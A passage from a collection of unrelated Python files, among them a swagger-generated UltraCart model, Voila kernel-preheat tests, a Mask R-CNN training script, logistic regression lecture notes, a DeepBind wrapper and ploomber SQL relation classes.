) -> DiscreteQValueNet:
body = FCBody(state_dim[0], *args, **kwargs)
head = LinearHead(body.output_dim, action_dim)
return DiscreteQValueNet(body, head, device=device)
return _net
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class EmailListSegmentMembership(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'email_list_uuid': 'str',
'email_segment_uuid': 'str',
'exclude': 'bool',
'name': 'str'
}
attribute_map = {
'email_list_uuid': 'email_list_uuid',
'email_segment_uuid': 'email_segment_uuid',
'exclude': 'exclude',
'name': 'name'
}
def __init__(self, email_list_uuid=None, email_segment_uuid=None, exclude=None, name=None): # noqa: E501
"""EmailListSegmentMembership - a model defined in Swagger""" # noqa: E501
self._email_list_uuid = None
self._email_segment_uuid = None
self._exclude = None
self._name = None
self.discriminator = None
if email_list_uuid is not None:
self.email_list_uuid = email_list_uuid
if email_segment_uuid is not None:
self.email_segment_uuid = email_segment_uuid
if exclude is not None:
self.exclude = exclude
if name is not None:
self.name = name
@property
def email_list_uuid(self):
"""Gets the email_list_uuid of this EmailListSegmentMembership. # noqa: E501
UUID identifying this email list or null if this is a segment # noqa: E501
:return: The email_list_uuid of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._email_list_uuid
@email_list_uuid.setter
def email_list_uuid(self, email_list_uuid):
"""Sets the email_list_uuid of this EmailListSegmentMembership.
UUID identifying this email list or null if this is a segment # noqa: E501
:param email_list_uuid: The email_list_uuid of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._email_list_uuid = email_list_uuid
@property
def email_segment_uuid(self):
"""Gets the email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
UUID identifying this email segment or null if this is a list # noqa: E501
:return: The email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._email_segment_uuid
@email_segment_uuid.setter
def email_segment_uuid(self, email_segment_uuid):
"""Sets the email_segment_uuid of this EmailListSegmentMembership.
UUID identifying this email segment or null if this is a list # noqa: E501
:param email_segment_uuid: The email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._email_segment_uuid = email_segment_uuid
@property
def exclude(self):
"""Gets the exclude of this EmailListSegmentMembership. # noqa: E501
true if customers from this list/segment is excluded from membership # noqa: E501
:return: The exclude of this EmailListSegmentMembership. # noqa: E501
:rtype: bool
"""
return self._exclude
@exclude.setter
def exclude(self, exclude):
"""Sets the exclude of this EmailListSegmentMembership.
true if customers from this list/segment is excluded from membership # noqa: E501
:param exclude: The exclude of this EmailListSegmentMembership. # noqa: E501
:type: bool
"""
self._exclude = exclude
@property
def name(self):
"""Gets the name of this EmailListSegmentMembership. # noqa: E501
Name of this email list or segment # noqa: E501
:return: The name of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this EmailListSegmentMembership.
Name of this email list or segment # noqa: E501
:param name: The name of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._name = name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(EmailListSegmentMembership, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, EmailListSegmentMembership):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from . import infer # noqa
from . import inject # noqa
from . import reflect # noqa
from .analyses import NamespaceAnalysis # noqa
from .analyses import RowsTableDependencies # noqa
from .analyses import TableDependenciesAnalysis # noqa
from .reflect import StrictTableDependenciesAnalysis # noqa
from .targets import Function # noqa
from .targets import Materialization # noqa
from .targets import Rows # noqa
from .targets import Table # noqa
from .targets import Target # noqa
|
import pytest
import time
import asyncio
import os
BASE_DIR = os.path.dirname(__file__)
NOTEBOOK_EXECUTION_TIME = 3
NUMBER_PREHEATED_KERNEL = 2
TIME_THRESHOLD = 1
@pytest.fixture
def voila_config_file_paths_arg():
path = os.path.join(BASE_DIR, '..', 'configs', 'preheat')
return '--VoilaTest.config_file_paths=[%r]' % path
@pytest.fixture
def preheat_mode():
return True
@pytest.fixture
def voila_notebook(notebook_directory):
return os.path.join(notebook_directory, 'preheat', 'pre_heat.ipynb')
async def send_request(sc, url, wait=0):
await asyncio.sleep(wait)
real_time = time.time()
response = await sc.fetch(url)
real_time = time.time() - real_time
html_text = response.body.decode("utf-8")
return real_time, html_text
async def test_refill_kernel_asynchronously(http_server_client, base_url):
await asyncio.sleep(NUMBER_PREHEATED_KERNEL*NOTEBOOK_EXECUTION_TIME + 1)
fast = []
slow = []
for i in range(5*NUMBER_PREHEATED_KERNEL):
time, _ = await send_request(sc=http_server_client, url=base_url)
if time < TIME_THRESHOLD:
fast.append(time)
else:
slow.append(time)
assert len(fast) > 1
assert len(slow) > 1
assert len(fast) + len(slow) == 5*NUMBER_PREHEATED_KERNEL
await asyncio.sleep(NOTEBOOK_EXECUTION_TIME + 1)
async def test_env_variable_defined_in_kernel(http_server_client, base_url):
await asyncio.sleep(NUMBER_PREHEATED_KERNEL*NOTEBOOK_EXECUTION_TIME + 1)
_, text = await send_request(sc=http_server_client, url=base_url)
assert "bar" in text
await asyncio.sleep(NOTEBOOK_EXECUTION_TIME + 1)
|
# Seja 'p' um numero Natural, # se não houver nenhum divisor de 'p' no intervalo [2, raiz(n)], então 'p' é primo.
def gerador_de_primos(n):
numeros = range(3, n+1, 2)
primos = []
while len(numeros) > 0:
numero = numeros[0]
novo_set = set(numeros) - set(range(numero, n+1, numero))
numeros = sorted(novo_set)
primos.append(numero)
return primos
def contar_primos_entre(xi, xf):
primos = gerador_de_primos(xf)
primos_no_intervalo = [n for n in primos if xi <= n <= xf]
return len(primos_no_intervalo)
xi = int(input('xi: '))
xf = int(input('xf: '))
# print(gerador_de_primos(xf))
print(contar_primos_entre(xi, xf))
|
import os
import sys
import random
import math
import re
import time
import numpy as np
import cv2
import tensorflow as tf
import matplotlib
import matplotlib.pyplot as plt
#cell:
from tinyenv.flags import flags
_FLAGS = flags()
# cell_end.
# Call this first to load the parameters.if you don't used tinymind service,then delete this cell
sys.path.insert(0, '../libraries')
from mrcnn.config import Config
import mrcnn.utils as utils
import mrcnn.model as modellib
import mrcnn.visualize as visualize
from mrcnn.model import log
import mcoco.coco as coco
import mextra.utils as extra_utils
print("current work directory:%s" % os.getcwd())
def save_to_file(file_name, contents):
fh = open(file_name, 'w')
fh.write(contents)
fh.close()
save_to_file(_FLAGS.output_dir+'/mobiles.txt', os.getcwd())
#sys.chdir("master/")
tf.app.flags.DEFINE_string(
'HOME_DIR',
_FLAGS.HOME_DIR,
'the home directory,default value is "master"')
tf.app.flags.DEFINE_string(
'DATA_DIR',
_FLAGS.DATA_DIR,
'the data directory,default value is "master/data/shapes"')
tf.app.flags.DEFINE_string(
'TRAINED_WEIGHTS_DIR',
'master/data/trained_model',
'the trained wights data directory,default value is "master/data/trained_model"')
tf.app.flags.DEFINE_string(
'SAVING_MODEL_DIR',
'master/data/logs',
'where the model data is to save,default value is "master/data/logs"')
tf.app.flags.DEFINE_string(
'COCO_MODEL_PATH',
'master/data/trained_model/mask_rcnn_coco.h5',
'the data directory,default value is "master/data/trained_model/mask_rcnn_coco.h5"')
tf.app.flags.DEFINE_string(
'inititalize_weights_with',
'coco',
'which dataset is used to acquire the initialize wights,default value is "coco"')
tf.app.flags.DEFINE_integer(
'num_classes', _FLAGS.num_class, 'Number of classes to use in the dataset.')
tf.app.flags.DEFINE_float(
'learning_rate', _FLAGS.learning_rate,
'The learning rate used by a polynomial decay learning rate.')
# HOME_DIR = 'master'
# DATA_DIR = os.path.join(HOME_DIR, "data/shapes")
# WEIGHTS_DIR = os.path.join(HOME_DIR, "data/weights")
# MODEL_DIR = os.path.join(DATA_DIR, "logs")
# # Local path to trained weights file
# COCO_MODEL_PATH = os.path.join(WEIGHTS_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
# if not os.path.exists(COCO_MODEL_PATH):
# utils.download_trained_weights(COCO_MODEL_PATH)
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))
return ax
# dataset_train = coco.CocoDataset()
# dataset_train.load_coco(DATA_DIR, subset="shapes_train", year="2018")
# dataset_train.prepare()
# dataset_validate = coco.CocoDataset()
# dataset_validate.load_coco(DATA_DIR, subset="shapes_validate", year="2018")
# dataset_validate.prepare()
# dataset_test = coco.CocoDataset()
# dataset_test.load_coco(DATA_DIR, subset="shapes_test", year="2018")
# dataset_test.prepare()
# # Load and display random samples
# image_ids = np.random.choice(dataset_train.image_ids, 4)
# for image_id in image_ids:
# image = dataset_train.load_image(image_id)
# mask, class_ids = dataset_train.load_mask(image_id)
# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
# image_size = 64
# rpn_anchor_template = (1, 2, 4, 8, 16) # anchor sizes in pixels
# rpn_anchor_scales = tuple(i * (image_size // 16) for i in rpn_anchor_template)
class ShapesConfig(Config):
"""Configuration for training on the shapes dataset.
"""
NAME = "shapes"
# Train on 1 GPU and 2 images per GPU. Put multiple images on each
# GPU if the images are small. Batch size is 2 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 3 # background + 3 shapes (triangles, circles, and squares)
# Use smaller images for faster training.
IMAGE_MAX_DIM = image_size
IMAGE_MIN_DIM = image_size
# Use smaller anchors because our image and objects are small
RPN_ANCHOR_SCALES = rpn_anchor_scales
# Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 32
STEPS_PER_EPOCH = 400
VALIDATION_STEPS = STEPS_PER_EPOCH / 20
def parse_and_config(self,FLAGS):
self.NAME = FLAGS.DATA_DIR.split('/')[-1]
self.NUM_CLASSES=FLAGS.num_classes
self.LEARNING_RATE = FLAGS.learning_rate
# config = ShapesConfig()
#config.display()
# model = modellib.MaskRCNN(mode="training", config=config, model_dir=MODEL_DIR)
# inititalize_weights_with = "coco" # imagenet, coco, or last
# if inititalize_weights_with == "imagenet":
# model.load_weights(model.get_imagenet_weights(), by_name=True)
# elif inititalize_weights_with == "coco":
# model.load_weights(COCO_MODEL_PATH, by_name=True,
# exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
# "mrcnn_bbox", "mrcnn_mask"])
# elif inititalize_weights_with == "last":
# # Load the last model you trained and continue training
# model.load_weights(model.find_last()[1], by_name=True)
# print("start training!")
# model.train((dataset_traindataset , dataset_validate,
# learning_rate=config.LEARNING_RATE,
# epochs=2,
# layers='heads')
#fine tune
'''
model.train((dataset_traindataset , dataset_validate,
learning_rate=config.LEARNING_RATE / 10,
epochs=3, # starts from the previous epoch, so only 1 additional is trained
layers="all")
'''
def main(_):
FLAGS = tf.app.flags.FLAGS
if not FLAGS.DATA_DIR:
raise ValueError('You must supply the dataset directory with --DATA_DIR')
COCO_MODEL_PATH = os.path.join(FLAGS.TRAINED_WEIGHTS_DIR, "mask_rcnn_coco.h5")
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(FLAGS.COCO_MODEL_PATH)
DATA_DIR = FLAGS.DATA_DIR
dataset_train = coco.CocoDataset()
dataset_train.load_coco(DATA_DIR, subset="shapes_train", year="2018")
dataset_train.prepare()
dataset_validate = coco.CocoDataset()
dataset_validate.load_coco(DATA_DIR, subset="shapes_validate", year="2018")
dataset_validate.prepare()
dataset_test = coco.CocoDataset()
dataset_test.load_coco(DATA_DIR, subset="shapes_test", year="2018")
dataset_test.prepare()
# image_ids = np.random.choice(dataset_train.image_ids, 4)
# for image_id in image_ids:
# image = dataset_train.load_image(image_id)
# mask, class_ids = dataset_train.load_mask(image_id)
# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
# image_size = 64
# rpn_anchor_template = (1, 2, 4, 8, 16) # anchor sizes in pixels
# rpn_anchor_scales = tuple(i * (image_size // 16) for i in rpn_anchor_template)
config = ShapesConfig()
config.parse_and_config(FLAGS)
model = modellib.MaskRCNN(mode="training", config=config, model_dir=FLAGS.SAVING_MODEL_DIR)
inititalize_weights_with = FLAGS.inititalize_weights_with # imagenet, coco, or last
if inititalize_weights_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif inititalize_weights_with == "coco":
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif inititalize_weights_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
model.train(dataset_train , dataset_validate,
learning_rate=config.LEARNING_RATE,
epochs=2,
layers='heads')
if __name__=='__main__':
tf.app.run()
|
####################################
# author: Gonzalo Salazar
# course: Python for Data Science and Machine Learning Bootcamp
# purpose: lecture notes
# description: Section 17 - Logistic Regression
# datasets: (i) Titanic: Machine Learning from Disaster (source: Kaggle),
# (ii) Advertising data: fake data.
####################################
### LOGISTIC REGRESSION ###
# We use it as a method for CLASSIFICATION since we are trying to predict discrete categories.
# For instance: (i) spam vs. ham emails; (ii) loan default (yes/no); or (iii) disease diagnosis
# Linear regression does not return good results when we are working with categories as dependent
# variables (e.g., a binary case) because it predicts results outside the scope of the categories
# (e.g., probabilities below 0 and above 1)
# Sigmoid (aka Logistic) Function takes any value and outpus it to be between 0 and 1.
# \phi(z) = 1/(1+e^{-z}), where z = b_0 + b_1 x (i.e., the linear model)
#%%
import os
#from numpy.lib.function_base import corrcoef
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import cufflinks as cf
cf.go_offline()
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
#%matplotlib inline
os.chdir('/Users/gsalazar/Documents/C_Codes/Learning-Python/Udemy_Py_DataScience_ML/logr_data')
#%%
train = pd.read_csv('titanic_train.csv')
test = pd.read_csv('titanic_test.csv')
# %%
# Brief descriptive statistics from the data
train.info()
train.describe()
# %%
train.head()
# %%
## Explanatory data analysis
# Checking for missing data
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
# Comment: we are missing some age info as well as a lot of cabin info. With the first
# we can fill in values taking into account other passengers with similar
# characteristics. In regard to cabin, it is not possible to fill in values, instead
# we might drop it or transform it to a binary variable (have cabin = 1, no cabin = 0)
# %%
# Describing the data we'll work with
sns.set_style('whitegrid')
sns.countplot(x = 'Survived', hue = 'Sex', data = train, palette = 'Greens')
# Comment: there is a tendency, more men tended not to survived compared to women
# %%
sns.countplot(x = 'Survived', hue = 'Pclass', data = train)
# Comment: mostly all who did not survived, belonged to the lowest class. Among the survivors,
# passengers from the highest class appear to have better chance to survive.
# %%
sns.displot(train['Age'].dropna(), kde = False, bins = 30, alpha = .4)
#train['Age'].plot.hist(bins = 30)
# Comment: bi-modal distribution. Skewed to the left, there is a minor concentration of young
# people 5-15 yo. and then the rest is concentrated, mostly, between 20 and 35 yo.
# %%
sns.countplot(x = 'SibSp', data = train)
# Comment: mostly all people in the Titanic were young or have 1 sibling or spouse (more probably)
# %%
sns.histplot(train['Fare'], bins = 40)
#train['Fare'].iplot(kind='hist',bins=30)
# Comment: related to the previous point. Smallest fares correspond to lower classes.
# %%
## Cleaning data: age will be imputed according to the average age on each Pclass
plt.figure(figsize = (10,7))
sns.boxplot(x = 'Pclass', y = 'Age', data=train)
mean_age = train.groupby('Pclass').mean()['Age']
def impute_age(cols):
Age = cols[0]
Pclass = cols[1]
if pd.isnull(Age):
if Pclass == 1:
return mean_age[1]
elif Pclass == 2:
return mean_age[2]
else:
return mean_age[3]
else:
return Age
train['Age'] = train[['Age','Pclass']].apply(impute_age,axis = 1) # axis tells we to apply
# it across the columns
# %%
# Checking Age after imputation
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
# Dropping cabin column
train.drop('Cabin', axis = 1,inplace=True)
# %%
# Checking any remaining missing value and deleting it (in case these are just a few)
plt.figure(figsize=(10,10))
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
train.dropna(inplace=True)
#%%
# Encoding categorical values
sex = pd.get_dummies(train['Sex'],drop_first=True) # drop_first will drop one of the columns
# to avoid having perfect collinearity
embark = pd.get_dummies(train['Embarked'],drop_first=True)
pclass = pd.get_dummies(train['Pclass'],drop_first=True) # it is actually a categorical value
train = pd.concat([train,sex,embark,pclass],axis=1)
train.head()
#%%
# Dropping columns that we're not going to use
train.drop(['Sex','Name','Embarked','Ticket','PassengerId','Pclass'],axis=1,inplace=True)
train.head()
# %%
## Training and using the model (NOTICE: train dataset is used as it were the complete dataset)
# Establishing the data we'll work with as well as defining training and testing samples
X = train.drop('Survived', axis = 1)
y = train['Survived']
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3, random_state = 101)
# Instantiating a linear regression model and training it
logm = LogisticRegression()
logm.fit(X_train,y_train)
#%%
# Predicting probability of surviving
predic = logm.predict(X_test)
# Checking performance
print('Classification Report')
print(classification_report(y_test,predic))
print('\nConfusion Matrix')
print(confusion_matrix(y_test,predic))
# Comment: performance can be increased by using the whole training.csv data as just training data.
# Also consider that more can be done by using NLP algorithms to extract information about
# names (i.e., Dr., Mr., etc.) or ticket info that could lead us to specific location on the
# the Titanic.
del y, X, X_test, X_train, y_train, y_test, logm, predic
####################################################################################
# PROJECT EXERCISE - Advertisement
# This data set contains the following features:
# 'Daily Time Spent on Site': consumer time on site in minutes
# 'Age': cutomer age in years
# 'Area Income': Avg. Income of geographical area of consumer
# 'Daily Internet Usage': Avg. minutes a day consumer is on the internet
# 'Ad Topic Line': Headline of the advertisement
# 'City': City of consumer
# 'Male': Whether or not consumer was male
# 'Country': Country of consumer
# 'Timestamp': Time at which consumer clicked on Ad or closed window
# 'Clicked on Ad': 0 or 1 indicated clicking on Ad
# %%
# Reading in the Ecommerce Customers csv file as a DataFrame called customers
ad_data = pd.read_csv('Advertising.csv')
# Checking the head of customers
ad_data.head()
# %%
# Checking out its info() and describe() methods
ad_data.info()
ad_data.describe()
# %%
## EXPLORATORY DATA ANALYSIS
sns.axes_style('whitegrid')
# Checking users' age
sns.histplot(ad_data['Age'],bins=30, alpha=.4)
# Comment: people is mostly 30 to 40 yo.
# %%
# Displaying relationship between Age and Area Income
sns.jointplot(y='Area Income', x='Age', data = ad_data,kind='reg',color='g')
# Comment: it appears that younger people are concentrated in a geographical
# area with higher avg. income
# %%
# Displaying relationship between Daily Time Spent on Site and Age
sns.jointplot(y='Daily Time Spent on Site', x='Age', data = ad_data,kind='kde',color='g', fill=True)
# Comment: young people spend more time on site than old people
# %%
# Displaying relationship between Daily Time Spent on Site and Daily Internet Usage
sns.jointplot(y='Daily Time Spent on Site', x='Daily Internet Usage', data = ad_data,kind='reg',color='g')
# Comment: there seems to be two groups. (i) high daily internet usage is associated with
# high daily time spent on site, and viceversa.
# %%
# Checking all the possible relationships among variables
sns.pairplot(data=ad_data,hue='Clicked on Ad',kind='hist',diag_kind='auto',corner=True)
# Comment: people who click on ad uses internet less compared to those who do not click on ad,
# regardless of age, time spent on site or area income.
# Those who click on ad use fewer internet than those who do not click (the same happens
# when we check the time spent on site). The latter also seems to be younger than the
# former, on average.
# %%
## TRAINING AND TESTING THE MODEL
# Establishing the data we'll work with as well as defining training and testing samples
X = ad_data.drop(['Clicked on Ad','Ad Topic Line','City','Country','Timestamp'],axis = 1)
y = ad_data['Clicked on Ad']
# NOTICE: I did not consider City or Country because I did not have enough representation for
# each of these categories (i.e., just 4/5 people from each country)
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3)
# Instantiating a linear regression model and training it
logm = LogisticRegression()
logm.fit(X_train,y_train)
#%%
# Predicting probability of surviving
predic = logm.predict(X_test)
# Checking performance
print('Classification Report')
print(classification_report(y_test,predic))
print('\nConfusion Matrix')
print(confusion_matrix(y_test,predic))
|
import socket
import random
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
TCP_IP = '127.0.0.1'
port = 15710
s.connect((TCP_IP,port))
BUFFER = 1024
x = 2
print(x)
s.sendall(str(x).encode("utf-8"))
#waiting for message
while True:
data = s.recv(BUFFER)
if data:
break
x = data.decode("utf-8")
print("received sum is = {}".format(x))
s.close()
|
"""Wrapper for pretrained Deepbind via Kipoi."""
import numpy as np
from spacy.tokens import Doc
from spacy.vocab import Vocab
from spacy.language import Language
from concise.preprocessing.sequence import encodeDNA, encodeRNA
from ....core import Task, DataType
from ...kipoi.core import KipoiModel
DEEPBIND_CLASSES = ['NotBinding', 'Binding']
ALPHABET = {'TF': ['T', 'C', 'G', 'A', 'N'], 'RBP': ['U', 'C', 'G', 'A', 'N']}
ONE_HOT_ENCODER = {'TF': encodeDNA, 'RBP': encodeRNA}
def create_sequence_language(alphabet):
"""Anchor accepts a spacy language for sampling the neighborhood."""
vocab = Vocab(strings=alphabet)
def make_doc(sequence):
sequence = sequence.replace(' ', '')
if len(sequence) == 0:
words = np.random.choice(alphabet)
else:
words = list(sequence)
return Doc(vocab, words=words, spaces=[False] * len(words))
return Language(vocab, make_doc)
def create_DNA_language():
return create_sequence_language(alphabet=ALPHABET['TF'])
def create_RNA_language():
return create_sequence_language(alphabet=ALPHABET['RBF'])
def character_correction(sequences_list, min_length, null_character='N'):
"""
Some perturbation based interpretability methods (e.g. lime)
might introduce null characters which are not viable input.
These are by default replaced with 'N' (for any character).
The sequence is padded to min_length characters.
"""
return [
s.replace('\x00', null_character).ljust(min_length, null_character)
for s in sequences_list
]
def preprocessing_function(
nucleotide_sequence, sequence_type, min_length=35, null_character='N'
):
"""One-hot-encode the sequence and allow passing single string."""
if isinstance(nucleotide_sequence, str):
sequences_list = [nucleotide_sequence]
else:
if not hasattr(nucleotide_sequence, '__iter__'):
raise IOError(
f'Expected a str or iterable, got {type(nucleotide_sequence)}.'
)
sequences_list = nucleotide_sequence
return ONE_HOT_ENCODER[sequence_type](
character_correction(sequences_list, min_length, null_character)
)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def postprocessing_function(binding_score, use_labels=True):
"""Instead of a score, interpreters expect labels or probabilities."""
if use_labels:
return binding_score > 0 # binding_probs > 0.5
else:
# not a score, but probability in [0,1]
binding_probs = np.expand_dims(sigmoid(binding_score), axis=1)
return np.hstack([1. - binding_probs, binding_probs])
class DeepBind(KipoiModel):
"""Deepbind wrapper via kipoi."""
def __init__(self, model, use_labels=True, min_length=0):
"""
Constructor.
Args:
model (string): kipoi model name.
use_labels (bool): if False, use probabilites instead of label.
min_length (int): minimal lenght of sequence used for eventual
padding with null_character ('N'). Some deepbind models fail
with too short sequences, in that case increase min_length.
On top of the kipoi model prediction, the predict method of this class
will preprocess a string sequence to one hot encoding using the
the input documentation to determine `sequence_type`.
It will also return not a binding score but either a classification
label or 'NotBinding','Binding' probabilities expected by interpreters.
"""
super().__init__(
model=model,
task=Task.CLASSIFICATION,
data_type=DataType.TEXT,
source='kipoi',
with_dataloader=False,
preprocessing_function=preprocessing_function,
preprocessing_kwargs={},
postprocessing_function=postprocessing_function,
postprocessing_kwargs={},
)
# kwargs
self.use_labels = use_labels
# self.model.schema.inputs.doc is always "DNA Sequence", use name
self.sequence_type = model.split('/')[2] # 'TF' or 'RBP'
self.min_length = min_length
def predict(self, sample):
self.preprocessing_kwargs['sequence_type'] = self.sequence_type
self.preprocessing_kwargs['min_length'] = self.min_length
self.postprocessing_kwargs['use_labels'] = self.use_labels
return super().predict(sample)
|
"""
Generate a list of N colors starting from color1 to color2 in RGB or HSV space
"""
from __future__ import print_function
print(__doc__)
from vtkplotter.colors import makePalette, getColorName
cols = makePalette("red", "blue", 10, hsv=True)
for c in cols:
print("rgb =", c, " closest color is:", getColorName(c))
|
import sqlite3
import json
from ploomber.products import Product
from ploomber.products.serializers import Base64Serializer
from ploomber.templates.Placeholder import SQLRelationPlaceholder
class SQLiteRelation(Product):
"""A SQLite relation
Parameters
----------
identifier: tuple of length 3
A tuple with (schema, name, kind) where kind must be either 'table'
or 'view'
client: ploomber.clients.DBAPIClient or SQLAlchemyClient, optional
The client used to connect to the database. Only required
if no dag-level client has been declared using dag.clients[class]
"""
def __init__(self, identifier, client=None):
super().__init__(identifier)
self._identifier._schema = None
self._client = client
def _init_identifier(self, identifier):
if identifier[0] is not None:
raise ValueError('SQLite does not support schemas, you should '
'pass None')
# SQLRelationPlaceholder needs a schema value, we use a dummy value
# for itniialization
# FIXME: this is a hacky, refactor SQLRelationPlaceholder
identifier = ('', identifier[1], identifier[2])
return SQLRelationPlaceholder(identifier)
@property
def client(self):
if self._client is None:
default = self.task.dag.clients.get(type(self))
if default is None:
raise ValueError('{} must be initialized with a client'
.format(type(self).__name__))
else:
self._client = default
return self._client
def _create_metadata_relation(self):
create_metadata = """
CREATE TABLE IF NOT EXISTS _metadata (
name TEXT PRIMARY KEY,
metadata BLOB
)
"""
self.client.execute(create_metadata)
def fetch_metadata(self):
self._create_metadata_relation()
query = """
SELECT metadata FROM _metadata
WHERE name = '{name}'
""".format(name=self._identifier.name)
cur = self.client.connection.cursor()
cur.execute(query)
records = cur.fetchone()
cur.close()
if records:
metadata_bin = records[0]
return json.loads(metadata_bin.decode("utf-8"))
else:
return None
def save_metadata(self):
self._create_metadata_relation()
metadata_bin = json.dumps(self.metadata).encode('utf-8')
query = """
REPLACE INTO _metadata(metadata, name)
VALUES(?, ?)
"""
cur = self.client.connection.cursor()
cur.execute(query, (sqlite3.Binary(metadata_bin),
self._identifier.name))
self.client.connection.commit()
cur.close()
def exists(self):
query = """
SELECT name
FROM sqlite_master
WHERE type = '{kind}'
AND name = '{name}'
""".format(kind=self._identifier.kind,
name=self._identifier.name)
cur = self.client.connection.cursor()
cur.execute(query)
exists = cur.fetchone() is not None
cur.close()
return exists
def delete(self):
"""Deletes the product
"""
query = ("DROP {kind} IF EXISTS {relation}"
.format(kind=self._identifier.kind,
relation=str(self)))
self.logger.debug('Running "{query}" on the databse...'
.format(query=query))
self.client.execute(query)
@property
def name(self):
return self._identifier.name
@property
def schema(self):
return self._identifier.schema
class PostgresRelation(Product):
"""A PostgreSQL relation
Parameters
----------
identifier: tuple of length 3
A tuple with (schema, name, kind) where kind must be either 'table'
or 'view'
client: ploomber.clients.DBAPIClient or SQLAlchemyClient, optional
The client used to connect to the database. Only required
if no dag-level client has been declared using dag.clients[class]
"""
# FIXME: identifier has schema as optional but that introduces ambiguity
# when fetching metadata and checking if the table exists so maybe it
# should be required
def __init__(self, identifier, client=None):
self._client = client
super().__init__(identifier)
def _init_identifier(self, identifier):
return SQLRelationPlaceholder(identifier)
@property
def client(self):
if self._client is None:
default = self.task.dag.clients.get(type(self))
if default is None:
raise ValueError('{} must be initialized with a client'
.format(type(self).__name__))
else:
self._client = default
return self._client
def fetch_metadata(self):
cur = self.client.connection.cursor()
if self._identifier.schema:
schema = self._identifier.schema
else:
# if schema is empty, we have to find out the default one
query = """
SELECT replace(setting, '"$user", ', '')
FROM pg_settings WHERE name = 'search_path';
"""
cur.execute(query)
schema = cur.fetchone()[0]
# https://stackoverflow.com/a/11494353/709975
query = """
SELECT description
FROM pg_description
JOIN pg_class ON pg_description.objoid = pg_class.oid
JOIN pg_namespace ON pg_class.relnamespace = pg_namespace.oid
WHERE nspname = %(schema)s
AND relname = %(name)s
"""
cur.execute(query, dict(schema=schema,
name=self._identifier.name))
metadata = cur.fetchone()
cur.close()
# no metadata saved
if metadata is None:
return None
else:
return Base64Serializer.deserialize(metadata[0])
# TODO: also check if metadata does not give any parsing errors,
# if yes, also return a dict with None values, and maybe emit a warn
def save_metadata(self):
metadata = Base64Serializer.serialize(self.metadata)
query = (("COMMENT ON {} {} IS '{}';"
.format(self._identifier.kind,
self._identifier,
metadata)))
cur = self.client.connection.cursor()
cur.execute(query)
self.client.connection.commit()
cur.close()
def exists(self):
cur = self.client.connection.cursor()
if self._identifier.schema:
schema = self._identifier.schema
else:
# if schema is empty, we have to find out the default one
query = """
SELECT replace(setting, '"$user", ', '')
FROM pg_settings WHERE name = 'search_path';
"""
cur.execute(query)
schema = cur.fetchone()[0]
# https://stackoverflow.com/a/24089729/709975
query = """
SELECT EXISTS (
SELECT 1
FROM pg_catalog.pg_class c
JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE n.nspname = %(schema)s
AND c.relname = %(name)s
);
"""
cur.execute(query, dict(schema=schema,
name=self._identifier.name))
exists = cur.fetchone()[0]
cur.close()
return exists
def delete(self, force=False):
"""Deletes the product
"""
cascade = 'CASCADE' if force else ''
query = f"DROP {self._identifier.kind} IF EXISTS {self} {cascade}"
self.logger.debug(f'Running "{query}" on the databse...')
cur = self.client.connection.cursor()
